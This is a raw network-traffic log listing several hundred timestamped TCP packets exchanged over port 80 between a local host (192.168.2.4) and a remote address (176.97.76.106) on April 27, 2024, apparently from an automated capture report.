Apr 27, 2024 00:46:06.796581984 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.796601057 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.796610117 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.796623945 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.796643972 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.796667099 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.796720982 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.796740055 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.796751976 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.796761990 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.796765089 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.796778917 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.796781063 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.796798944 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.796808958 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.796821117 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.796832085 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.796864986 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.796864986 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.796880960 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.796900988 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.796911001 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.796931982 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.796935081 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.796951056 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.796971083 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.797101974 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.797113895 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.797130108 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.797142029 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.797147036 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.797154903 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.797169924 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.797178984 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.797183037 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.797192097 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.797204971 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.797218084 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.797230005 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.797235012 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.797247887 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.797257900 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.797275066 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.797276974 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.797286987 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.797302961 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.797326088 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.797331095 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.797343969 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.797374010 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.797383070 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.797410011 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.797420025 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.797421932 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.797441006 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.797471046 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.797475100 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.797487974 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.797507048 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.797509909 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.797521114 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.797532082 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.797557116 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.797580957 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.797595024 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.797605991 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.797629118 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.797656059 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.797677040 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.797689915 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.797700882 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.797718048 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.797728062 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.797739983 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.797749043 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.797774076 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.797779083 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.797787905 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.797807932 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.797837019 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.797842979 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.797858000 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.797868967 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.797879934 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.797883034 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.797889948 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.797915936 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.798008919 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.798038960 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.798062086 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.798078060 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.798080921 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.798096895 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.798115969 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.798127890 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.798266888 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.798289061 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.798306942 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.798325062 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.798332930 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.798369884 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.798393011 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.798410892 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.798423052 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.798441887 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.798441887 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.798468113 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.798475981 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.798484087 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.798502922 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.798536062 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.798537016 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.798551083 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.798573017 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.798583031 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.798590899 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.798597097 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.798615932 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.798634052 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.798656940 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.798670053 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.798688889 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.798691988 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.798702002 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.798708916 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.798722029 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.798728943 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.798736095 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.798751116 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.798751116 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.798759937 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.798767090 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.798784971 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.798808098 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.799597025 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.799609900 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.799633980 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.799649000 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.799653053 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.799665928 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.799688101 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.799705982 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.800045967 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.800072908 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.800087929 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.800088882 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.800111055 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.800120115 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.800131083 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.800163984 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.800345898 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.800384998 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.800784111 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.800825119 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.800867081 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.800903082 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.800942898 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.801000118 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.801018953 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.801062107 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.801071882 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.801107883 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.801126957 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.801165104 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.801208973 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.801249027 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.801275969 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.801345110 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.801374912 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.801413059 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.801456928 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.801496983 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.801522017 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.801556110 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.801585913 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.801616907 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.801625013 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.801654100 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.801731110 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.801773071 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.801785946 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.801826000 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.802294016 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.802330017 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.802340031 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.802376986 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.802407980 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.802447081 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.802474976 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.802488089 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.802510977 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.802529097 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.802552938 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.802592993 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.802623034 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.802658081 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.802659988 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.802671909 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.802689075 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.802690983 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.802701950 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.802711010 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.802753925 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.802763939 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.802809954 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.802824974 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.802836895 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.802844048 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.802850962 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.802862883 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.802862883 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.802876949 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.802882910 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.802896976 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.802901030 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.802915096 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.802927017 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.802930117 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.802951097 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.802957058 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.802974939 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.802975893 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.802998066 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.803003073 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.803020000 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.803040028 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.803050041 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.803062916 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.803081989 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.803087950 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.803102970 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.803119898 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.803123951 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.803144932 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.803164005 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.803183079 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.803184986 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.803205967 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.803221941 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.803241014 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.803281069 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.803297997 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.803322077 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.803329945 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.803381920 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.803400993 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.803415060 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.803421021 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.803427935 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.803430080 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.803447962 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.803486109 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.803503990 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.803520918 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.803534031 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.803545952 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.803546906 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.803553104 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.803559065 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.803577900 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.803577900 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.803590059 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.803592920 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.803603888 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.803625107 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.803637981 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.803652048 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.803678036 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.803692102 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.803703070 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.803705931 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.803724051 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.803731918 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.803750038 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.803767920 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.803774118 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.803786039 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.803798914 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.803805113 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.803817987 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.803833961 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.803839922 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.803853035 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.803869963 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.803881884 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.803903103 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.803919077 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.803930998 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.803967953 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.803985119 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.804002047 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.804013968 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.804024935 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.804033995 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.804056883 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.804125071 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.804136992 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.804151058 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.804167986 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.804172039 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.804186106 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.804193020 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.804198980 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.804210901 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.804219007 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.804249048 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.804254055 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.804265976 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.804276943 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.804291964 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.804306030 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.804322958 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.804326057 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.804346085 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.804373980 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.804377079 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.804390907 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.804410934 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.804419041 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.804435015 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.804455042 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.804469109 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.804497957 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.804507017 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.804536104 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.804578066 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.804589987 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.804600954 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.804617882 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.804621935 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.804630995 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.804649115 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.804675102 CEST	80	49734	176.97.76.106	192.168.2.4
